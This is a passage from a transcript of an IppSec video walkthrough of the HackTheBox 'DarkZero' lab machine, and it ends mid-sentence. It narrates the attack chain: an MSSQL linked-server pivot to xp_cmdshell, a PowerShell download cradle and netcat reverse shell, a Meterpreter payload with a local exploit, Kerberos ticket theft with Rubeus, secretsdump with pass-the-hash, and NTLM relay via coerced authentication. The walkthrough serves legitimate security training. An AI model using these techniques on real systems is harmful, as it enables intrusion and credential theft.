HackTheBox - DarkZero

IppSec · Beginner ·🔐 Cybersecurity ·3mo ago

Key Takeaways

This video demonstrates how to hack the DarkZero box on HackTheBox using tools like nmap, NetExec, MSSQL.PY, and XP_CMDSHELL to gain a shell

Full Transcript

What's going on YouTube? This is IppSec. Today, we'll be doing Dark Zero from Hack The Box. And thanks to a couple of unintended methods, which are really cool, I think this machine's on the easier side of hard. We start off with creds to Microsoft SQL, and there's a linked server we can pivot to to get code execution. And this is just a nested VM. The intended way to privesc is somewhat difficult. However, there's a load of ways to privesc. I think most people abused a Windows CVE from 2024. There's also abusing the logon token, which was an unintended vector in this assigned machine because, well, securing Microsoft SQL is very hard. And then, I think there's one which is a CVE Dakota found where you can coerce an authentication and abuse NTLM relay. This is the partial mic remove method. However, the intended way to solve this box is we have to get the NTLM hash of the account through certificate login, then reset the password so we can log in as a service, which has the SeImpersonate privilege. Once we're admin on this box, we can abuse a bidirectional trust and TGT delegation to steal a Kerberos ticket from the adjacent domain and get to surf there. So, with all that being said, let's just jump in. As always, we're going to start off with an Nmap. So, -sC for default scripts, -sV enumerate versions, -vv for double verbose. This gives us things like the TTL, -oA output all formats in the Nmap directory and call it darkzero, and the IP address of 10.129.10.69. This can take some time to run, so I already ran it. Looking at the results, we have 13 ports open. The first thing I see is DNS on port 53, and the TTL's 127, so we know this is a Windows server. It's even telling us over here. But whenever I see DNS on Windows, I always scroll down to LDAP and confirm, yes, this is Active Directory. It is giving us the full common name in the SSL cert. So, let's go ahead and grab this, and we'll add it to our host file. So, sudo vi /etc/hosts 10.129.10.60 Nope, it's 69. Nice. And then, add that. Add the domain name, and I accidentally put a period there. There we go. Save that. And let's go take a look at what else we have. Now, normally when I see DNS on Windows, I'm used to seeing like simple name server or something here like simple name plus. Uh we don't see a banner. Maybe this is like to a recent Windows version, maybe 2025 or whatever the latest one, maybe that's running this. And they removed that banner. Um that's a little bit odd, don't know why, but let's just go on and move. Uh we have Kerberos, MSRP, more RPC stuff, LDAP, we already looked at that. Let's scroll down. Uh let's see, SMB on 445, bunch of other ports, SSL again 636. Uh what's after this? Um Did I miss something? Yeah, right here. We have MSSQL on 1433. And we see this is SQL Server 2022. Um let's go down. Uh we also have something I'm not used to seeing, 2179. It says VM RDP. Um I think this is Hyper-V specific, so if we had like the Hyper-V GUID, I think we could actually like RDP into this box. Um of course we need credentials as well. But it looks like Hyper-V is running and there's probably other child VMs. So after I look at Nmap, I'm going to look for like a TTL of 126 to see if any other VMs are listening. Um that is a clue that Hyper-V is running. And we don't see anything else. So what I'm going to do real quick, grep 126 on the thing. And we don't have that as the TTL, right? If I grep 127, we see everything here. So it doesn't look like any service of a VM is exposed, and again, the main reason I'm thinking that is this VM RDP thing. Now, this box is an assumed breach scenario, so we start out with a set of credentials. I'm going to use NetExec, and we're just going to test this out. So dark0.htb, user john.w and the password. So let's see what we have access to here. We run this. Um there we go. And let's see, it is Windows Server 2025. It's kind of odd that the MSSQL said 2022, right? Uh let's look at Nmap. Uh MSSQL uh 1433 is the port. Uh yeah, it's a SQL Server 2022, but the box is 2025. Don't know exactly why. Uh we have dc01 darkzero.htb. Um there's not much here. Uh we could do like {dash} {dash} shares to see if there's any unique file shares on the box, but I'm going to try other protocols. I would normally also run like BloodHound at this point, but I'm going to hold off on that cuz it makes sense to do it a little bit later in the video and keep all that stuff together, right? Looking at LDAP, we see we can authenticate. Signing is enforced. Channel binding one supported. Um let's see. Let's check WinRM real quick to see if we have a quick shell on the box. And then um there was also MSSQL. So, running this we see I do have access to Microsoft SQL. Um encryption is not required on it. Don't think that really means too much to us. But, let's try um using Impacket's MSSQL client. Um and then we can give it darkzero.htb john.w. Got to get that password again. It's probably in my clipboard, but just in case it's not it is now. Put that in. And then at dc01.darkzero.htb. Uh login failed. There is a way to specify different authentication, right? We have yeah, Windows authentication. So, let's go ahead and specify that. Boom. Uh get rid of the {dash}h. And there we go. We have a shell on the SQL Server. So, I'm just going to do um a new DB and we don't see any unique databases. Um if I saw like a web one, I'd go in that try to export hashes. We are guest, so I'm assuming we can't really go into master things like that. Um let's see. We can try to enable XP CMD shell, right? Uh we don't have permission. Let's see. Let's just try it for um the sake of it. We can't execute. So, what else could we do? Um I'm going to stop responder so we'll do pseudo responder -i ton0. Uh we needed capital I. I hate that. And then I'm going to try XP dirtree and then 10 10 15 8, which is my IP. Give it a fake file. And we see the hash of the Microsoft SQL server is DC01 dollar. Um this is going to be a Whenever I see something ends in dollar, I just assume it's going to be a randomly generated password and we can't crack it. So, I'm not even going to try to crack this one and let's see what else we have. Um let's see. Enum links is next. And we do see a second domain controller. We have DC02.darkzero.ext. So, if I do a use link on that, um let's try putting this in quotes. I don't know if my version of impact is out of date, but that is weird that we need quotes. And now we see we are DBO at master, right? So, if we do a new Is it DB here? There's nothing new here. But since we are the DBO master, we can probably enable XP CMD shell. Is that the flag? Um is it a underscore here? There we go. It has changed from zero to one. So, now if If run this, we can do a who am I, and boom, we have code execution. So, let's go ahead and now create a web cradle to give us a shell, right? So, I'm going to do a make dir dum dum dum, go in here. I'm going to copy user share nishang. Um let's see, shells then invoke power shell TCP one line.ps1. And I'm just going to call it shell.ps1. Let's edit this. And we'll give ourselves the IP. So, let's go here. 10 10 15 8 9001 Okay. And then I also like um creating a web cradle. So, I'm going to do a um IEX new object net.webclient download string http 10 10 15 8 Uh this is port 8000 shell. ps1. I think that's what we called it. That looks good to me. And we can do cat cmd uh iconvert -t utf-16 little endian base64 w0. So, now we can execute this, right? So, I'm going to go ahead and copy this. Python 3 -m http server. Let's do a nc lvnp 9001 or rlwrap this so we have the up and down key. And we'll do xp cmd shell power shell -enc for encoded command. Run this. And there we go. We see a shell here. Now, I know what you're thinking. Like, why did I um even bother with this web server, right? We could have done something like this. Um we could just cat shell.ps1 have this giant base 64 blob. Well, it's actually not that big. Um listen and we could say powershell {dash} enc Whoops. Make sure that space is not there. Uh powershell {dash} enc Oh, it's too long. Um so that is too big actually. Uh sometimes you can do something like this and it'll just work. I'm sure we could probably shrink this up. I bet if we use the bottom one on this. Uh let's see. Let's do shell two. B shell two Let's see if we can do this real quick. Um Do this. Maybe this one is smaller. 10 10 15 8 9001 Let's see. Let's do shell two. Copy. Powershell encoded command. Boom. Still too long. Um But the whole reason I like the web cradle, I didn't expect this to be too big. Um but uh I like it because you can identify when like antivirus trips you up, right? Um Where is the thing? Let's get back to where we were. Uh we probably have the up arrow, right? Python 3 Up up up. There we go. This is a much smaller one. Boom. So, what I meant about like antivirus is if you just one shot the shell, um you don't know where it fails, right? Um you just don't get the shell. Um if you do a web cradle, so it actually hits that code and then sends you a shell, um generally powershell downloading a file, Defender's not going to flag that. So, you know you have code execution here. Then, if you don't get the shell, you know something like Defender may have flagged you. Maybe, um, you don't have access to port 9001 externally. Essentially, you just have a easy way to know where the failure is. Most times, um, things can download files, but sometimes you have problems when you try to like send a shell or do things like that. So, I always like just keeping a super simple stager payload to just go download something and then run it, cuz it downloading it confirms you have code execution, but um, that's just me. Hopefully, that, uh, clears things up if you've ever wondered why I do some things. Now, this next step, um, this box we have like four different ways to priv esc, I think. I'm going to show one way now, and at the end of the video, we'll show three other ways. I don't want to show them all at once, because we'd probably be here for 45 minutes until moving to the next spot, because there's so many different ways we can priv esc. Um, but long story short, this is going to be the unintended one, and it happens because the VM inside the machine was not patched, right? So, if I do like get item, uh, property, HKEY_LOCAL_MACHINE, SOFTWARE, Microsoft, uh, Windows, I did a pipe, Windows NT, current version. I want to say this is the right string. There we go. This is generally how I enumerate, uh, Windows versions nowadays. Um, we see the LCU version right here, 20382113. This is going to tell us the last time a patch has been installed, essentially, right? The main thing is this piece. This is going to be like Windows 2022, so you see this a lot, but this is going to be in a KB article, and it'll be essentially the minor patch or whatever it's called for Windows. But, let's go Google. I like now doing like sup site, I want to say support windows.com. It could be microsoft.com. Um let's try Microsoft real quick. It's probably Microsoft, actually. Um typo. There we go. So, we can see OS build 20348.2113. Uh see, this one's 4529. That's December 9th, 2025. But, this is November 14th, 2023, which is a long time ago. So, they just installed this VM and never updated it. So, we have a lot of different ways to priv esc. A really good way to do it quickly is using like Metasploit. I know a lot of people hate it, but nowadays, I still do enjoy it. So, I'm going to do a pseudo msfdb run to get into it. And uh let's also create a um Meterpreter payload, right? So, I'm going to do msfvenom p uh windows/x64/meterpreter reverse_tcp. Uh we have to give it the executable extension. And then I'm going to give it met.exe. And I'm going to put this in my www directory in a second. Let's make sure I got all this right. I didn't get it all right. It still compiled, but I forgot lhost is equal to 10.10.15.8. lport is equal to we'll do quad four, the default Meterpreter. But, that should give us met.exe. Then, I'm going to go to cd program data. Let's do a wget http 10.10.15.8 8000 met.exe o met.exe and hope Defender does not eat this. Uh we don't have Python's HTTP server running anymore. cd www python3 -m http.server. There we go. Downloaded again. It has been downloaded. Awesome. So, we can use exploit multi handler. Then we'll do a set payload to be Windows x64 meterpreter reverse TCP. Set LHOST ton zero. Let's run this. Execute meterpreter. And there we go. We have a meterpreter shell in a second. Um did that error? Nope. There we go. So, I'm going to background this. And then I'm going to do a search. I think it's exploit underscore cuz I want to look for right here. The um post multi recon local exploit suggester. So, I'm going to do use one. Um I'm guessing it's going to be session one. Yep. So, if we do a set session one, run. It's going to collect a bunch of exploits and see which one is valid. I'm going to pause the video for a second cuz this is going to take probably a minute to collect them all. But we'll resume when this is done. Okay. So, now this is finished. We have a bunch of nos that's going to be is exploitable. Um I just want to show options real quick. Um Nope. I was just wondering if it had a way to easily filter all the things that aren't exploitable. So, let's just go to the top. Um let's see. Potentially vulnerable is the yes. Potentially bypass .NET profiler. This doesn't look like a priv esc. Maybe it is. Uh CVEs 2022. I'm just going to go ahead and ignore this because we saw the box was last patched 2023. Uh we have the CLFS driver. Target is running version. It looks like it is vulnerable. Um I'm just going to pick this off Z bypass one cuz it looks like a 2024 one and I know this is relatively stable just from experience. But, I'd probably try all these if one of these doesn't work. So, I'm just going to do use this exploit. We can set the session again to one. Show options. Uh, let's do set LHOST to ton zero. And I don't think there's any other arguments. So, let's just go ahead and run. And it's reflectively, it looks like we're getting a new payload here. Session two opened. If I do get UID, there we go. We are system. So, we have now priv asked on the um, virtual host or the Hyper-V host that is DC02. We could drop into a shell. Um, I think I'm going to forget how to do this in Metasploit. Uh, get system. We don't need to do that. Play. Where is it? Let's see. System commands. Get privs, networking. Is there exact? Execute. Who am I? Uh, that's a file. Am I in a shell? No, I'm in Metasploit. It says the command is shell to drop into a system shell. Shell. Okay. I don't know why um, it didn't work before, but yeah. We're now, I guess, on the box. And at this point, it's probably going to make sense to run BloodHound just so we can like enumerate the trust and do everything else. Um, I wonder if we have something in Metasploit, actually. Uh, search enum trust, maybe. Enum trusted locations. Uh, that's office. Uh, let's see. Search post Windows. There are 283 things. I'll probably just use BloodHound, but I want to see if we can do this Metasploit just cuz we don't do it that much. Uh, there is an enum domain and enum domains. Let's try running both of them real quick. So, we'll do use set session one. I wonder if I can do like a G set. Is that it? Um set G. Oh, wait. We actually want session two now, right? So, let's see. This is going to be domain information. Let's do a domains. And what that set G did, it was a global set, right? So, if I do show options now, it's automatically set to session one, so I don't have to keep or session two, so I don't have to keep retyping that. So, let's do enum domains and see what this gives us. Um, I'm going to run BloodHound either way. Um because this didn't give us anything. Uh, current setting two There's nothing else here. Um, so yeah. Let's just go ahead and run BloodHound against the parent domain. So, let's do a uh, get TGT. I always like getting the ticket first. Um, we can do cat creds. So, we'll do john.w. Let's copy this password. at Uh, was it DC01.darkzero.htb? Uh, empty domain not allowed in Kerberos. Is it darkzero /? Name or service not known. Let's see. sudo v etsy host dark zero Uh pre-authentication failed. sudo ntp date It's probably time related dco1.darkzero.htb. We adjusted the clock. Still failed. Oh, let's see. That's definitely the password. Can I specify Kerberos? What am I doing wrong here? The reason why I like getting Kerberos tickets first is um I find it to be more stable with BloodHound cuz BloodHound doesn't support um like pass the hash and other things, but maybe I'm going to give up and just try BloodHound first. And try letting BloodHound authenticate. Um let's try one last thing. Uh it doesn't actually specify target. Is this that weird script? Yes, it is. So, that was the issue. Um for some reason get TGT, you don't put the target afterwards. Maybe the target has to match 100% what the thing is. Maybe it's like dco1. Um hold on 1 second. Let's do sudo v etsy host. Let's try dco1. Does that work? No. Um I'm not exactly sure what's going on. Maybe it's like the order in my host file or maybe you just never put the target for get TGT. But, this seems to work. Not sure exactly why. Um we got the cache. Awesome. So, let's go ahead and run RustHound. So, I'm just going to do um RustHound and we have to also KRB5CCNAME is equal to our CC cash file. There we go. Um, I can specify {dash} K for Kerberos. We can give it domain dark0.htb. I don't actually know if we need that. It may be smart enough to pull it. Um, I'm going to give it {dash} Z so we get a zip file. And it looks like Oh, we need the fully qualified name. So, let's do {dash} F DCO1 dark0.htb. Run this. Cannot find KDC or realm. Oh, this is probably because um it uses like Linux's Kerberos config. So, let's do a NX C SMB DCO1 dark0.htb. Generate KRB5 file dark0.com. I'll call it. And this should give us the config. And we can just do this export. So, we don't have to like overwrite the Etsy Kerberos config. Uh, we can just export this. And now all our tools should use that KRB5 file, all right? There we go. Um, what I was saying before is you could also copy that file over top of Etsy uh KRB5.com. It's the same file. I like just setting it in the um environment variable. That way we're not overriding what's on our box. But now we have RustHound. Let's do CD opt BloodHound server docker-compose up {dash} D. And then we need to um open up Chrome and connect to BloodHound. But this is going to take probably a minute or two to start up. So, I'm just going to pause the video and we'll resume when BloodHound is all started. And now, BloodHound should be started. So, let's open a file browser window. Then, go over to BloodHound and we'll drag and drop our scan here. And then, do upload. Says it's uploaded. If we view ingestion history, we can see it is now ingesting. And I'm just going to again pause the video and we'll resume once it's done ingesting cuz this can also take like a minute or two. And now that it is complete, let's go over to explore. We can go over to Cypher queries. And then, if we just like run a basic one, we should see information, right? So, I'm going to do map domain trust. And the main reason I'm doing this is when we did that MSSQL command, we knew there was a second domain, right? Um I don't see it here. Let's see. Enum uh link, I think it was, right? Uh we see multiple domains. We have dark0.ext. Of course, we have a shell, so we know that is a second domain. So, I want to see what information is about this trust, right? If we just search BloodHound for trust, um let's see. Abusable configuration. If we click this, we get no results. If we look at the map domain trust, we just see it's a cross forest trust and um there's not much information in BloodHound about it. But, if we go over into the actual JSON data, uh we can get data. Um there's also like if you do like Enum trust.ps1, uh I want to say there's like a PowerShell script or something like this that would be good to run. You also get all the detail we're about to see. Um it's probably in this repo, right? Is this it? No. Was it just a new trust? What is the PowerShell script? Not exactly sure. Um but I like just doing it from BloodHound. I'm sure if you look at OXDF, he's going to use the PowerShell script. Um I'll show it this way. Let's go MBH. Let's do 7zX. 2026. Yep. And then I want to look at the domains.json file. So, if we cat this, do a jq. Um we can look at all the information here. There's something right here. Awesome. So, the whole trust section. So, right off the bat we see bidirectional, right? This means each domain trust each other. And you may be thinking like, oh, we can just um abuse this by grabbing the um machine hash that's used to sign tickets in the external domain. I'm going to call this external cuz it's EXT. But in this domain we can take the hash that's responsible for syncing to the um darkzero.htb domain, add an extra SID, and essentially create like a golden ticket. Um if you want to know more about that attack, I want to say we I have it on like ipsec.rocks. I know we've done before. Um let's do domain trust. Right? Yeah, the ghost machine. Um look at that machine. It's not going to work here because SID filtering is enabled. So, what this is going to do is um in that scenario, uh let's see if we can type this out real quick. Um we have the darkzero.ext, right? And then let's say there's a um I'm going to say an EXT account and this is used to sync uh darkzero.ext to darkzero.htb. And it's by so the sync goes both ways. Let's just say this is the account name. I don't know if that would be it. Um But what the SID filtering is doing cuz in this attack, this just means we have a hash that we can use to sign Kerberos tickets that this domain is going to trust. And in that attack, what you would do is you'd say the um EXT {slash} administrator account is also a member of the HTB, I guess we can say darkzero. So this makes more sense. Um is a Let's do member of domain admins, right? So when we present this ticket over to this guy, he'll be like, oh, you're a member of my domain admins. I'm going to give you domain admin privilege over my uh domain. Um But what the SID filtering does is it says only things in this domain can be a part of the ticket. So the SID filtering would filter this out because it's a SID of a foreign domain. Um so that's why we can't do this attack because of SID filtering. So since that is there, um we can't use that. Let's see. Is there anything else in this? Um let's see. Is transitive trust attribute direction type? Um I'm actually not sure if this is telling me what I need to know for the next thing. Maybe it's the is transitive. I don't know exactly what that means. Um let's see. Is transitive I can't spell. Uh domain AD. Let's see. Does anything come up really quick? Trust manager transitive Single trust. Um, let's just find that a new trust thing. I want to run that and just see if anything else pops out at me cuz I'm not going to learn Active Directory um, while I'm recording this video. So, let's see. Um, it's probably going to be PowerSploit, right? PowerSploit a new trust. Is this it? Um, let's see. I don't think this is it. Nope, that's not it. I hate when you know like the name of the script, but you just can't find where it is. Maybe it's a new AD trust. Um, this is it. Awesome. Finally found it. Uh, so let's go ahead and download this script cuz this is going to put it in a easier to read format for us. I want to say what we want is part of this trust attribute thing, but we're just getting the like um, numerical value, the mask or whatever it is and not the actual name of the trust. So, let's go ahead and do CD dub dub dub. W get this. Awesome. Uh, let's see. We have their meterpreter session here. I don't think we even need um, to be admin. So, I'm just going to run it here. So, we can do curl HTTP 10 10 15 8 8000. Um, what is the script name? It is going to be case sensitive. So, let's go ahead and make sure we have it. -n -o Don't need to say it twice. There we go. And we probably could have just done like IEX to download this, right? Oh. Why did this not download? Is this shell dead? Curl 10 10 15 8 8000. That is running. Weird. Show. Uh let's do sessions-i 2. Show. CD program data. I guess I probably should have like loaded PowerShell or something. Um but there we go. We can download. I guess this show down here died. Um not sure why, but we can do PowerShell a new AD trust.ps1. Okay, it is running. Awesome. And let's see. So, we have the trust direction bidirectional. We saw that. Uh forest-wide authentication, the transitive, we talked about SID filtering. What I wanted to show is TGT delegation. So, this is going to mean like if we have a Kerberos ticket on our domain, we can like delegate with it and use it um backwards, I guess. And it's essentially like a unconstrained delegation attack. I don't know Kerberos that well, but um I just know when I see this, this is generally something I attempt to exploit. So, what we want to do is um get Rubius running because that's going to monitor our Kerberos tickets. And then once we have Rubius running, we are going to go back into the Microsoft SQL server. And from the DC01, we're going to request a file off of DC02. And by doing that, we're going to get the Kerberos ticket used by DC01 into memory where we can extract it and then replay it on our box. So, it's a relatively like complicated attack to explain, but I think once we do it, it'll probably make sense, right? I'm just going to kill that show cuz that looks dead. Um so, let's see what we need to do is run a executable. Um there's a way to do this in Metasploiter. Um, let's see. Search execute underscore Um, let's see. BG. Let's do search execute. Is it assembly? Uh, let's see. Search assembly. That is a lot. There we go. I'm going to use this module. And we can also up upload Rubius to the box and run it manually. But since we already have Metasploiter, might as well show it, right? So, let's do show options. And let's see. We want to do .NET EXE. And we'll need arguments. Uh, it's already got session two cuz we did the global set. So, let's go ahead and set the .NET EXE to opt uh, sharp collection net framework 4.5. 4 5 any Rubius. Okay. And we can set arguments. And what arguments do we want to use? Um, I want to say it's just monitor, so we monitor tickets. And then we can set the interval to like 5 seconds, so we output to standard out every 5 seconds. And then we can tell it um, no wraps, so it doesn't um, wrap things. That's like a text formatting thing. I think that's all we need. If I do run, let's see. There we go. And it's outputting a bunch of tickets. Awesome. So, we can look through this and we always see like service SQL DCO2. That's administrator. DCO2 administrator. These are all for the darkzero.ext domain. So, we need a ticket to darkzero.htb. Um, so let's go ahead and I guess we can kill this. Yep. And then let's restart this. And I'm going to do an XP dir tree. And then we'll say DCO2. dark dark0.htb. And I'm just going to do Cval. Um, cuz that's a file share, right? We can close that window. We don't need that. Don't need that. Where is my Metasploit? So I just want to show we're still just seeing dark0 uh DCO2, right? So I'm going to now run this. And hopefully within like 5 seconds, we'll see the new TGT. So that's DCO2 still. DCO2. We still don't see DCO1, right? DCO1. Don't see it. Let's see. DCO2 dark0. I should have it. DCO1. Nope. Say DCO2. I wonder if we had an argument to like filter out DCO2. Oh, wait. We have got HTB. That XT. Okay. Come on. There we go. Here is a user DCO1. So we have the Kerberos ticket here. So let's go ahead and copy this out. It is base64 encoded. And if we didn't do the no wrap, I think it would be like 20 characters per line then doing a bunch of enters. This just puts it all on one line, which makes it easier for us to play with. Um I'm actually probably going to look at this again real quick. Hold on. Uh where is DCO1? There it is. I don't know if I copied the whole thing cuz I don't think I ended with a equals. So I'm just going to copy it again to be double safe. There we go. And now let's say um V DCO1. Uh uh what is this? It's going to be a Kirby file. So I'll do kirbi. b 64. Uh that's not the right clipboard. There it is. So we can base 64 {dash} D DCO1 and then we'll just call this DCO1.kirbi. Let's less this real quick. Binary file. That looks fine. And then what do we need? We need to use um ticket converter to convert it into a CC cache file. So we'll do um DCO1.kirbi DCO1.ccache. It has now converted it. And now for the sake of explanation, let's just do describe ticket on DCO1.ccache. And we can see all the details of this ticket, right? The service name is going to be kerbi TGT. So that's the service that this ticket is good for. And then the flags, this is going to be what is important. Um we see it's forwarded and forwardable. This means it came from a machine that has unconstrained delegation, I believe. So this is going to be essentially why we can do this. Um if unconstrained delegation wasn't there, then the ticket would essentially just be only for that host. And that host would be the dark0.exe. But you don't even see um anything specific to that domain just because this is an unconstrained delegation, meaning we can use it wherever we see fit. So, let's go ahead and, um, run secretsdump. So, we'll do KRB5CCNAME, if I can type that correctly, CCName is equal to dc01.ccache, then just run secretsdump.py I'll say dc01. um, darkzero.htb. And let's see. There we go. We start getting um, everything. So, let's go and, uh, grab the administrator's, um, NTLM hash. So, let's go ahead and grab this. Copy. And we can say, um, let's do psexec.py -hashes and administrator@dc01.darkzero.htb. And hopefully, we get a shell. Looks like we do. So, CD users administrator desktop. And we can also get root.txt. Um, user.txt is in the, um, local administrator of the VM. Um, it's just in both of these places for this, uh, here, but it does get forwarded. Uh, let's do a shell uh, sessions -i 2. Shell. CD Actually, we didn't need shell. We could do everything from meterpreter itself, but oh well. Um, users administrator and desktop. And we can get user.txt there. So, um, that is going to be the box, but we're not done because I did say there are a heap of unintendeds to priv esc on this box, right? This is the VM. Uh, right now we are NT authority system. We got the shell through MySQL, right? We're going to do that again. Um, but we're going to priv esc three other ways cuz I find them all to be interesting. And for you Metasploit haters, we're not going to be using this anymore. So, we no longer need Metasploit. Uh so, we can exit everything. And let's see. So, we have Python here. Um let's see. We have to do a new links. Use link dc02darkzero.ext and this had to be enclosed for whatever reason. And do we have the xpc md shell? We don't. I was hoping I had it in my history, so I could just copy and paste, but it's fine. PowerShell -enc I convert. Let's do Was it shell.ps1? Yeah. Uh no, it was cmd. There we go. And this is the other reason why I always like just um using web cradles and everything like this because it makes it easy to go back and um resume where I was. So, we can do rlwrap nc l v n p 9001. Send this off. Um xpc md shell PowerShell enc What? Maximum length too long. cat cmd I convert. Did I like paste it twice cuz this looks much longer than that. No. What? I screwing up? xpc md shell PowerShell who am I That does work. cat cmd I feel like I'm taking crazy pills cuz this literally worked earlier. echo {dash} n wc {slash} c 216. So, that is longer than 128. Um I am confused. 216 I am not sure what's going on Oh. Did I type over this? There we go. Was that my mistake like earlier in the video? Oh man, that is going to be embarrassing. We have the shell there. Um hold on 1 second. Let's I convert cmd We'll do shell.ps1. I think that may have been a problem before and I typed it and I didn't notice. rlwrap nc lvm p 9001 We have that there. Actually We'll close that and we'll put it here. Close this. Oh man, my terminal's getting wonky. xp cmd shell who am I Does this still work? It doesn't. Let's just close out. Redo. use link dc02.darkzero.htb Got a quote. xp uh ext xp cmd shell PowerShell and see this big blob. It does work. Um, so that must have been my mistake earlier in the video. Uh, that's embarrassing. Oh, well. Um Does this show live? It is. Sweet. Okay, so just a heads-up, I'm inserting a weird cut here. I've already recorded the other privesc method. However, um, I wanted to show this one first right after it because I know once we show two other privesc methods that kind of go together, uh, people are going to tune out of the video and they won't see this one which I think is the coolest part of this box because I don't think I've shown it on this channel yet. So, um, this is going to abuse NTLM relay and we're going to, um, coerce an authentication, forward it back to the box, and get a shell as LDAP. We can't do it on the parent domain because that one is patched. This is a, um, June 2025 patch. So, let's go ahead and look at this. Um You see God potato and all this stuff here because, again, I've already recorded other pieces of it. Uh, let's do decrypter.cloud. Um, decrypter the person that creates a lot of these potato exploits is the one that I believe have found this. Um let's see. Exploiting I think it's going to be this post. Uh, let's see. Remove partial Let's see. Decrypter remove mic partial. For the people that have been pentesting a long time, they know about the remove mic, um, exploit which was drop the mic in 2019. This is a variation of that. I can't find exactly what blog post it is. I want to say it's going to be this one. But, we're just going to do it manually and kind of explain as we go. Essentially, um you drop a portion of the packet that says signing is required, and Windows never checks it, I believe. I think that's the gist of it. So, let's go ahead and clone this project because we need the um NTLM relay from this. So, I'm going to do sudo {dash} u. And the reason why I'm going to be doing this piece as root is um you have to listen on port 445. And if we use um like Python privileges, things like that, um things get wonky, it doesn't work. You just have to be root. Um it's weird. But, okay, let's do Python 3 {dash} m venv.vm to create the environment. And once this gets created, we can do a source {dot} venv bin activate. And let's see. I want to do probably a pip 3 install {dot} I want to say. Is that just going to install it here? It is. So, while this installs, we also have to grab KerbRelay. Um and the reason why we're grabbing this is it has the way to um What was I going to say? Maybe it's KerbRelayX. What is it? But, it has the um command to add a DNS name, and low-privilege users can do this, right? Yep, that's what we need. So, I'm also going to do a get clone. I'm just installing this one that is fine. Um pip 3 Actually, can we just run dnstool? It looks like we can. So, we have to get Chisel running first cuz we're going to have to do some type of proxy. So, let's go and copy up Chisel chisel.exe over here. And then in the shell, we can go to program data wget hdp 10 10 15 8 8000 chisel.exe and then we'll call it chisel.exe. There we go. And then we can start the service. We'll do up chisel chisel and then um is it dash p for port? We'll do 8001. Um we want to allow reverse and socks five, I want to say. Am I getting this correct, all the syntax? Um dash p Uh let's see. history grep chisel the last five See, that is all my commands. And I don't have any more. Let's see. Oh, we forgot server. That's the flag we forgot. server That looks fine. Awesome. So here, we can do {dot} {slash} chisel client 10 10 15 8 and then our socks. And what this is going to do, I'm not hitting enter yet. We should be able to do proxychains and see oh um dash zv 127.0.0.1 445 proxychains. We see connection refused cuz my proxy isn't listening, right? So I'm going to run this. And client, we would probably have to 8001. Uh that's not working. Uh dot slash chisel.exe. Client 10.10.15.8. DIR. Uh we never got chisel. It was a 404. CP dot chisel. I probably just copied it. There. Yeah, I wasn't in dub dub dub when I did that copy. There we go. So, let's go back to that Wget. There we go. And then we can do chisel.exe client. That should be fine. We can see we're not connected yet. I thought I would be. I want to say it's capital R. There we go. So, that's the correct syntax. And now if I do this proxychains command, we see it is open. So, what I want to do is a proxychains uh Python 3 DNS tool dash U dark zero.htb/johnw. And I think this user actually has login privilege to the um darkzero.ext domain. That's what we're also going to check here. Uh we're going to give it the password. Let's cat creds. We'll grab this password. Copy. Paste the password. And then action add. This guy's host name is DCO2. And then we have to give it the um this piece is going to be the vulnerability. I've explained it in other things. Um this is what got fixed in June. But essentially this is going to Marshall over so it's like an SPN or something weird. Something weird happens under the hood. That's all you need to know. Uh 10 10 15 8. Let's see. I'm going to give it the DNS IP. 0 0 1. Tell it to use TCP. And then we're also giving the host cuz we're going through our proxy. So this hopefully makes its way over to the dark zero dot EXT domain and creates this host for us. Run it. Unrecognized argument. Of course. Um let's see. -dnsip --tcp. Host name. The host name should be 127.0.0.1. You that's open close open close action add. This I'm missing one flag I think. -d is going to be data. Oh, we need action add. This doesn't have an argument. -r for record. There we go. Um unsupported hash type MD4. Uh let's see. pip3 install PyCryptodome. Let's see. There we go. So now we have a record here. And this is going to resolve to 10.10.15.8 and because of that weird marshalling thing, when it makes this DNS request, it gets our IP address, but when it looks at privileges, it just thinks it's DCO2. So, now we can kind of impersonate that DCO2 person. So, I'm going to do NTLM relay X and I'm going to do remove mic partial -SMB2 support. The target is going to be LDAP S at DCO2. Uh let's see. Actually, we can do probably 127.0.0.1. I don't think we need the host name. No validate privs -i. I think this is all we need. Oh wait, we need a proxy chain set. Okay. So, now we're listening on all ports and essentially, when we get a connection, we're going to forward it over to the DCO2.darkzero.ext. So, what we have to do now is a um coerce attack. So, we need to make the DCO2 service reach back to us. So, what I'm going to do is net exec um I think it's SMB modules, right? And we can proxy chain this. Um 127.0.0.1 U john.w -p We got to get that password again. -d the domain darkzero.htb. Let's make sure we can authenticate. Awesome. And then module was it coerce plus I want to say. Look at options. Let's see, is this the module? It is. The listener we're going to do that D C O 2. So, let's copy this. Make sure we get all the A's. We're going to do that D C O 2 name that we created. And then the method, I'm going to use DFS coerce. Um oh, we forgot the dash O flag. For options, there we go. So, the dash O is going to specify options to module um whatever impacket module you have. And we didn't get a head back, which is odd. Uh let's see. Listener, we have four A's there, DFS coerce. Try this again. Did my chisel die or something? Oh, but chisel died, then um I wouldn't be able to hit this proxy chains. Something is odd here. Okay, there we go. It just took a few tries. We finally get it. We see it started a interactive shell on port 11000. So, let's do NC 127001 on that port. And this is an impacket shell. So, I can do add user. Let's do uh please subscribe. And now we have created a new user with please subscribe, and there's the password. I'm going to uh let's see, get user group. What was add user? I think it's add user to group. Please subscribe. And then I'll add it to administrators. There we go. So please subscribe has been added to the administrators group. So now we should be able to PSExec. So if I do a um proxychains PSExec .py uh please subscribe this password at Oh man, this this could actually be bad cuz we have an at in the password. Um we'll see. 127.0.0.1 Oh my god, impacket is smart enough to know to only use the last at for a separator for the host name. But now we are system on this uh container. Or Hyper-V VM, right? And what Microsoft had done is they've kind of fixed that whole marshalling thing. So if we wanted to try this attack, we need to create that um weird DNS object with the marshalling in place. But it's not going to work if we try it against the main domain. So we can show this real quick. Um we can do uh where's that add? Uh what was it? If I do 10.10.15.8, there we go. So let's see. We want to add this record. We want to make this DCO1. And let's see. We probably don't need that anymore. We can just say DCO1.dark0.htb. Um We have to force SSL. How do we do this? I think just {dash} force SSL. Did that not do it? I thought it was {dash} force SSL. It's telling me that's what the command is. Does it have to go earlier? I have the {dash} H still. Um {dash} port 636 Oh, we don't want proxy chains anymore. Binding to host. Uh DNS does not exist dark0.htb. What just happened there? {dash} DNS IP DCO1.dark0.htb DNS query name does not exist. Don't know what I'm doing wrong here. tail {dash} 1 at C Oh, maybe I can add Kerberos? Oh, wait. This is going through proxy chains again. We don't want that. Still having that issue. {dash} K for Kerberos DNS query name does not exist dark0.htb. >> 10.129.10.92 Okay, it did not want the DNS name as DNS IP. Whatever. But now we have created this um record. So, let's go ahead and try this same thing we just did. So, 